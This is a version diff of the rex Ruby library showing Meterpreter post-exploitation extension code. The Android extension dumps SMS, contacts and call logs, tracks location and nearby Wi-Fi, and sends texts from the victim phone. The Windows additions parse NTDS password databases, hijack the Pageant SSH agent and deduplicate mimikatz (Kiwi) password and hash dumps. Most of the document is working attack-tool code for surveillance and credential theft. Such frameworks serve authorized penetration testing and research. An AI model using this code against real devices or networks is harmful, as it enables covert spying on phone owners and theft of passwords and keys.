rex 2.0.8 → 2.0.9

data/lib/rex/post/meterpreter/extensions/android/android.rb

@@ -1,11 +1,11 @@
 #!/usr/bin/env ruby
+#
 # -*- coding: binary -*-
 require 'rex/post/meterpreter/extensions/android/tlv'
 require 'rex/post/meterpreter/packet'
 require 'rex/post/meterpreter/client'
 require 'rex/post/meterpreter/channels/pools/stream_pool'
 
-
 module Rex
 module Post
 module Meterpreter
@@ -17,9 +17,28 @@ module Android
 # extension by Anwar Mohamed (@anwarelmakrahy)
 ###
 
-  
 class Android < Extension
 
+  COLLECT_TYPE_WIFI = 1
+
+  COLLECT_ACTION_START  = 1
+  COLLECT_ACTION_PAUSE  = 2
+  COLLECT_ACTION_RESUME = 3
+  COLLECT_ACTION_STOP   = 4
+  COLLECT_ACTION_DUMP   = 5
+
+  COLLECT_TYPES = {
+    'wifi' => COLLECT_TYPE_WIFI
+  }
+
+  COLLECT_ACTIONS = {
+    'start'  => COLLECT_ACTION_START,
+    'pause'  => COLLECT_ACTION_PAUSE,
+    'resume' => COLLECT_ACTION_START,
+    'stop'   => COLLECT_ACTION_STOP,
+    'dump'   => COLLECT_ACTION_DUMP
+  }
+
   def initialize(client)
     super(client, 'android')
 
@@ -30,88 +49,129 @@ class Android < Extension
         {
           'name' => 'android',
           'ext'  => self
-        },
+        }
       ])
   end
-  
+
+  def collect_actions
+    return @@collect_action_list ||= COLLECT_ACTIONS.keys
+  end
+
+  def collect_types
+    return @@collect_type_list ||= COLLECT_TYPES.keys
+  end
+
   def device_shutdown(n)
     request = Packet.create_request('device_shutdown')
     request.add_tlv(TLV_TYPE_SHUTDOWN_TIMER, n)
     response = client.send_request(request)
-    return response.get_tlv(TLV_TYPE_SHUTDOWN_OK).value
-  end 
-  
+    response.get_tlv(TLV_TYPE_SHUTDOWN_OK).value
+  end
+
+  def interval_collect(opts)
+    request = Packet.create_request('interval_collect')
+    request.add_tlv(TLV_TYPE_COLLECT_ACTION, COLLECT_ACTIONS[opts[:action]])
+    request.add_tlv(TLV_TYPE_COLLECT_TYPE, COLLECT_TYPES[opts[:type]])
+    request.add_tlv(TLV_TYPE_COLLECT_TIMEOUT, opts[:timeout])
+    response = client.send_request(request)
+
+    result = {
+      headers:     [],
+      collections: []
+    }
+
+    case COLLECT_TYPES[opts[:type]]
+    when COLLECT_TYPE_WIFI
+      result[:headers] = ['Last Seen', 'BSSID', 'SSID', 'Level']
+      result[:entries] = []
+      records = {}
+
+      response.each(TLV_TYPE_COLLECT_RESULT_GROUP) do |g|
+        timestamp = g.get_tlv_value(TLV_TYPE_COLLECT_RESULT_TIMESTAMP)
+        timestamp = Time.at(timestamp).to_datetime.strftime('%Y-%m-%d %H:%M:%S')
+
+        g.each(TLV_TYPE_COLLECT_RESULT_WIFI) do |w|
+          bssid = w.get_tlv_value(TLV_TYPE_COLLECT_RESULT_WIFI_BSSID)
+          ssid = w.get_tlv_value(TLV_TYPE_COLLECT_RESULT_WIFI_SSID)
+          key = "#{bssid}-#{ssid}"
+
+          if !records.include?(key) || records[key][0] < timestamp
+            # Level is passed through as positive, because UINT
+            # but we flip it back to negative on this side
+            level = -w.get_tlv_value(TLV_TYPE_COLLECT_RESULT_WIFI_LEVEL)
+            records[key] = [timestamp, bssid, ssid, level]
+          end
+        end
+      end
+
+      records.each do |k, v|
+        result[:entries] << v
+      end
+    end
+
+    result
+  end
+
   def dump_sms
-    sms = Array.new
+    sms = []
     request = Packet.create_request('dump_sms')
     response = client.send_request(request)
 
-    response.each( TLV_TYPE_SMS_GROUP ) { |p|
-
-      sms <<
-      {
+    response.each(TLV_TYPE_SMS_GROUP) do |p|
+      sms << {
         'type' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_TYPE).value),
         'address' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_ADDRESS).value),
         'body' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_BODY).value).squish,
         'status' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_STATUS).value),
         'date' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_DATE).value)
       }
-
-    }
-    return sms
+    end
+    sms
   end
 
   def dump_contacts
-    contacts = Array.new
+    contacts = []
     request = Packet.create_request('dump_contacts')
     response = client.send_request(request)
 
-    response.each( TLV_TYPE_CONTACT_GROUP ) { |p|
-
-      contacts <<
-      {
+    response.each(TLV_TYPE_CONTACT_GROUP) do |p|
+      contacts << {
         'name' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CONTACT_NAME).value),
         'email' => client.unicode_filter_encode(p.get_tlv_values(TLV_TYPE_CONTACT_EMAIL)),
         'number' => client.unicode_filter_encode(p.get_tlv_values(TLV_TYPE_CONTACT_NUMBER))
       }
-
-    }
-    return contacts
+    end
+    contacts
   end
 
   def geolocate
-
-    loc = Array.new
+    loc = []
     request = Packet.create_request('geolocate')
     response = client.send_request(request)
 
-    loc <<
-    {
+    loc << {
       'lat' => client.unicode_filter_encode(response.get_tlv(TLV_TYPE_GEO_LAT).value),
       'long' => client.unicode_filter_encode(response.get_tlv(TLV_TYPE_GEO_LONG).value)
     }
 
-    return loc
+    loc
   end
 
   def dump_calllog
-    log = Array.new
+    log = []
     request = Packet.create_request('dump_calllog')
     response = client.send_request(request)
 
-    response.each(TLV_TYPE_CALLLOG_GROUP) { |p|
-
-      log <<
-      {
+    response.each(TLV_TYPE_CALLLOG_GROUP) do |p|
+      log << {
         'name' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_NAME).value),
         'number' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_NUMBER).value),
         'date' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_DATE).value),
         'duration' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_DURATION).value),
         'type' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_TYPE).value)
       }
-
-    }
-    return log
+    end
+    log
   end
 
   def check_root
@@ -119,8 +179,38 @@ class Android < Extension
     response = client.send_request(request)
     response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
   end
-end
 
+  def send_sms(dest, body, dr)
+    request = Packet.create_request('send_sms')
+    request.add_tlv(TLV_TYPE_SMS_ADDRESS, dest)
+    request.add_tlv(TLV_TYPE_SMS_BODY, body)
+    request.add_tlv(TLV_TYPE_SMS_DR, dr)
+    if dr == false
+      response = client.send_request(request)
+      sr = response.get_tlv(TLV_TYPE_SMS_SR).value
+      return sr
+    else
+      response = client.send_request(request, 30)
+      sr = response.get_tlv(TLV_TYPE_SMS_SR).value
+      dr = response.get_tlv(TLV_TYPE_SMS_SR).value
+      return [sr, dr]
+    end
+  end
+
+  def wlan_geolocate
+    request = Packet.create_request('wlan_geolocate')
+    response = client.send_request(request, 30)
+    networks = []
+    response.each(TLV_TYPE_WLAN_GROUP) do |p|
+      networks << {
+        'ssid' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_WLAN_SSID).value),
+        'bssid' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_WLAN_BSSID).value),
+        'level' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_WLAN_LEVEL).value)
+      }
+    end
+    networks
+  end
+end
 end
 end
 end

data/lib/rex/post/meterpreter/extensions/android/tlv.rb

@@ -7,31 +7,52 @@ module Meterpreter
 module Extensions
 module Android
 
-TLV_TYPE_SMS_ADDRESS      = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9001)
-TLV_TYPE_SMS_BODY         = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9002)
-TLV_TYPE_SMS_TYPE         = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9003)
-TLV_TYPE_SMS_GROUP        = TLV_META_TYPE_GROUP     | (TLV_EXTENSIONS + 9004)
-TLV_TYPE_SMS_STATUS       = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9005)
-TLV_TYPE_SMS_DATE         = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9006)
-
-TLV_TYPE_CONTACT_GROUP    = TLV_META_TYPE_GROUP     | (TLV_EXTENSIONS + 9007)
-TLV_TYPE_CONTACT_NUMBER   = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9008)
-TLV_TYPE_CONTACT_EMAIL    = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9009)
-TLV_TYPE_CONTACT_NAME     = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9010)
-
-TLV_TYPE_GEO_LAT          = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9011)
-TLV_TYPE_GEO_LONG         = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9012)
-
-TLV_TYPE_CALLLOG_NAME     = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9013)
-TLV_TYPE_CALLLOG_TYPE     = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9014)
-TLV_TYPE_CALLLOG_DATE     = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9015)
-TLV_TYPE_CALLLOG_DURATION = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9016)
-TLV_TYPE_CALLLOG_GROUP    = TLV_META_TYPE_GROUP     | (TLV_EXTENSIONS + 9017)
-TLV_TYPE_CALLLOG_NUMBER   = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9018)
-
-TLV_TYPE_CHECK_ROOT_BOOL  = TLV_META_TYPE_BOOL      | (TLV_EXTENSIONS + 9019)
-
-TLV_TYPE_SHUTDOWN_TIMER   = TLV_META_TYPE_UINT      | (TLV_EXTENSIONS + 9020)
+TLV_TYPE_SMS_ADDRESS                 = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9001)
+TLV_TYPE_SMS_BODY                    = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9002)
+TLV_TYPE_SMS_TYPE                    = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9003)
+TLV_TYPE_SMS_GROUP                   = TLV_META_TYPE_GROUP     | (TLV_EXTENSIONS + 9004)
+TLV_TYPE_SMS_STATUS                  = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9005)
+TLV_TYPE_SMS_DATE                    = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9006)
+
+TLV_TYPE_CONTACT_GROUP               = TLV_META_TYPE_GROUP     | (TLV_EXTENSIONS + 9007)
+TLV_TYPE_CONTACT_NUMBER              = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9008)
+TLV_TYPE_CONTACT_EMAIL               = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9009)
+TLV_TYPE_CONTACT_NAME                = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9010)
+
+TLV_TYPE_GEO_LAT                     = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9011)
+TLV_TYPE_GEO_LONG                    = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9012)
+
+TLV_TYPE_CALLLOG_NAME                = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9013)
+TLV_TYPE_CALLLOG_TYPE                = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9014)
+TLV_TYPE_CALLLOG_DATE                = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9015)
+TLV_TYPE_CALLLOG_DURATION            = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9016)
+TLV_TYPE_CALLLOG_GROUP               = TLV_META_TYPE_GROUP     | (TLV_EXTENSIONS + 9017)
+TLV_TYPE_CALLLOG_NUMBER              = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9018)
+
+TLV_TYPE_CHECK_ROOT_BOOL             = TLV_META_TYPE_BOOL      | (TLV_EXTENSIONS + 9019)
+
+TLV_TYPE_SHUTDOWN_TIMER              = TLV_META_TYPE_UINT      | (TLV_EXTENSIONS + 9020)
+
+TLV_TYPE_SMS_SR                      = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9021)
+
+TLV_TYPE_WLAN_GROUP                  = TLV_META_TYPE_GROUP     | (TLV_EXTENSIONS + 9022)
+TLV_TYPE_WLAN_BSSID                  = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9023)
+TLV_TYPE_WLAN_SSID                   = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9024)
+TLV_TYPE_WLAN_LEVEL                  = TLV_META_TYPE_UINT      | (TLV_EXTENSIONS + 9025)
+
+TLV_TYPE_SMS_DR                      = TLV_META_TYPE_BOOL      | (TLV_EXTENSIONS + 9026)
+
+TLV_TYPE_COLLECT_TYPE                = TLV_META_TYPE_UINT      | (TLV_EXTENSIONS + 9050)
+TLV_TYPE_COLLECT_ACTION              = TLV_META_TYPE_UINT      | (TLV_EXTENSIONS + 9051)
+TLV_TYPE_COLLECT_TIMEOUT             = TLV_META_TYPE_UINT      | (TLV_EXTENSIONS + 9052)
+TLV_TYPE_COLLECT_RESULT_GROUP        = TLV_META_TYPE_GROUP     | (TLV_EXTENSIONS + 9053)
+TLV_TYPE_COLLECT_RESULT_TIMESTAMP    = TLV_META_TYPE_QWORD     | (TLV_EXTENSIONS + 9054)
+
+# Reuse existing IDs for these
+TLV_TYPE_COLLECT_RESULT_WIFI         = TLV_TYPE_WLAN_GROUP
+TLV_TYPE_COLLECT_RESULT_WIFI_BSSID   = TLV_TYPE_WLAN_BSSID
+TLV_TYPE_COLLECT_RESULT_WIFI_SSID    = TLV_TYPE_WLAN_SSID
+TLV_TYPE_COLLECT_RESULT_WIFI_LEVEL   = TLV_TYPE_WLAN_LEVEL
 
 end
 end

data/lib/rex/post/meterpreter/extensions/extapi/extapi.rb

@@ -5,6 +5,8 @@ require 'rex/post/meterpreter/extensions/extapi/window/window'
 require 'rex/post/meterpreter/extensions/extapi/service/service'
 require 'rex/post/meterpreter/extensions/extapi/clipboard/clipboard'
 require 'rex/post/meterpreter/extensions/extapi/adsi/adsi'
+require 'rex/post/meterpreter/extensions/extapi/ntds/ntds'
+require 'rex/post/meterpreter/extensions/extapi/pageant/pageant'
 require 'rex/post/meterpreter/extensions/extapi/wmi/wmi'
 
 module Rex
@@ -34,6 +36,8 @@ class Extapi < Extension
               'service'   => Rex::Post::Meterpreter::Extensions::Extapi::Service::Service.new(client),
               'clipboard' => Rex::Post::Meterpreter::Extensions::Extapi::Clipboard::Clipboard.new(client),
               'adsi'      => Rex::Post::Meterpreter::Extensions::Extapi::Adsi::Adsi.new(client),
+              'ntds'      => Rex::Post::Meterpreter::Extensions::Extapi::Ntds::Ntds.new(client),
+              'pageant'   => Rex::Post::Meterpreter::Extensions::Extapi::Pageant::Pageant.new(client),
               'wmi'       => Rex::Post::Meterpreter::Extensions::Extapi::Wmi::Wmi.new(client)
             })
         },

data/lib/rex/post/meterpreter/extensions/extapi/ntds/ntds.rb

@@ -0,0 +1,39 @@
+# -*- coding: binary -*-
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Extapi
+module Ntds
+
+###
+#
+# This meterpreter extension contains extended API functions for
+# parsing the NT Directory Service database.
+#
+###
+class Ntds
+
+  def initialize(client)
+    @client = client
+  end
+
+  def parse(filepath)
+    request = Packet.create_request('extapi_ntds_parse')
+    request.add_tlv( TLV_TYPE_NTDS_PATH, filepath)
+    # wait up to 90 seconds for a response
+    response = client.send_request(request, 90)
+    channel_id = response.get_tlv_value(TLV_TYPE_CHANNEL_ID)
+    if channel_id.nil?
+      raise Exception, "We did not get a channel back!"
+    end
+    Rex::Post::Meterpreter::Channels::Pool.new(client, channel_id, "extapi_ntds", CHANNEL_FLAG_SYNCHRONOUS)
+  end
+
+  attr_accessor :client
+
+end
+
+end; end; end; end; end; end
+

data/lib/rex/post/meterpreter/extensions/extapi/pageant/pageant.rb

@@ -0,0 +1,44 @@
+# -*- coding: binary -*-
+
+module Rex
+  module Post
+    module Meterpreter
+      module Extensions
+        module Extapi
+          module Pageant
+            ###
+            # PageantJacker extension - Hijack and interact with Pageant
+            #
+            # Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
+            #
+            ###
+            class Pageant
+              def initialize(client)
+                @client = client
+              end
+
+              def forward(blob, size)
+                return nil unless size > 0 && blob.size > 0
+
+                packet_request = Packet.create_request('extapi_pageant_send_query')
+                packet_request.add_tlv(TLV_TYPE_EXTENSION_PAGEANT_SIZE_IN, size)
+                packet_request.add_tlv(TLV_TYPE_EXTENSION_PAGEANT_BLOB_IN, blob)
+
+                response = client.send_request(packet_request)
+                return nil unless response
+
+                {
+                  success: response.get_tlv_value(TLV_TYPE_EXTENSION_PAGEANT_STATUS),
+                  blob: response.get_tlv_value(TLV_TYPE_EXTENSION_PAGEANT_RETURNEDBLOB),
+                  error: response.get_tlv_value(TLV_TYPE_EXTENSION_PAGEANT_ERRORMESSAGE)
+                }
+              end
+
+              attr_accessor :client
+            end
+          end
+        end
+      end
+    end
+  end
+end

data/lib/rex/post/meterpreter/extensions/extapi/tlv.rb

@@ -72,6 +72,15 @@ TLV_TYPE_EXT_ADSI_PATH_PATH                 = TLV_META_TYPE_STRING | (TLV_TYPE_E
 TLV_TYPE_EXT_ADSI_PATH_TYPE                 = TLV_META_TYPE_UINT   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 69)
 TLV_TYPE_EXT_ADSI_DN                        = TLV_META_TYPE_GROUP  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 70)
 
+TLV_TYPE_NTDS_TEST                          = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 80)
+TLV_TYPE_NTDS_PATH                          = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 81)
+
+TLV_TYPE_EXTENSION_PAGEANT_STATUS           = TLV_META_TYPE_BOOL   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 85)
+TLV_TYPE_EXTENSION_PAGEANT_ERRORMESSAGE     = TLV_META_TYPE_UINT   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 86)
+TLV_TYPE_EXTENSION_PAGEANT_RETURNEDBLOB     = TLV_META_TYPE_RAW    | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 87)
+TLV_TYPE_EXTENSION_PAGEANT_SIZE_IN          = TLV_META_TYPE_UINT   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 88)
+TLV_TYPE_EXTENSION_PAGEANT_BLOB_IN          = TLV_META_TYPE_RAW    | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 89)
+
 TLV_TYPE_EXT_WMI_DOMAIN                     = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 90)
 TLV_TYPE_EXT_WMI_QUERY                      = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 91)
 TLV_TYPE_EXT_WMI_FIELD                      = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 92)

data/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb

@@ -2,6 +2,7 @@
 
 require 'rex/post/meterpreter/extensions/kiwi/tlv'
 require 'rexml/document'
+require 'set'
 
 module Rex
 module Post
@@ -283,9 +284,12 @@ class Kiwi < Extension
     request.add_tlv(TLV_TYPE_KIWI_PWD_ID, pwd_id)
     response = client.send_request(request)
 
+    # keep track of unique entries
+    uniques = Set.new
+
     results = []
     response.each(TLV_TYPE_KIWI_PWD_RESULT) do |r|
-      results << {
+      result = {
         :username => r.get_tlv_value(TLV_TYPE_KIWI_PWD_USERNAME),
         :domain   => r.get_tlv_value(TLV_TYPE_KIWI_PWD_DOMAIN),
         :password => r.get_tlv_value(TLV_TYPE_KIWI_PWD_PASSWORD),
@@ -294,6 +298,17 @@ class Kiwi < Extension
         :lm       => r.get_tlv_value(TLV_TYPE_KIWI_PWD_LMHASH),
         :ntlm     => r.get_tlv_value(TLV_TYPE_KIWI_PWD_NTLMHASH)
       }
+
+      # generate a "unique" set identifier based on the domain/user/pass. We
+      # don't use the whole object because the auth hi/low might be different
+      # but everything else might be the same. Join with non-printable, as this
+      # can't appear in passwords anyway.
+      set_id = [result[:domain], result[:username], result[:password]].join("\x01")
+
+      # only add to the result list if we don't already have it
+      if uniques.add?(set_id)
+        results << result
+      end
     end
 
     return results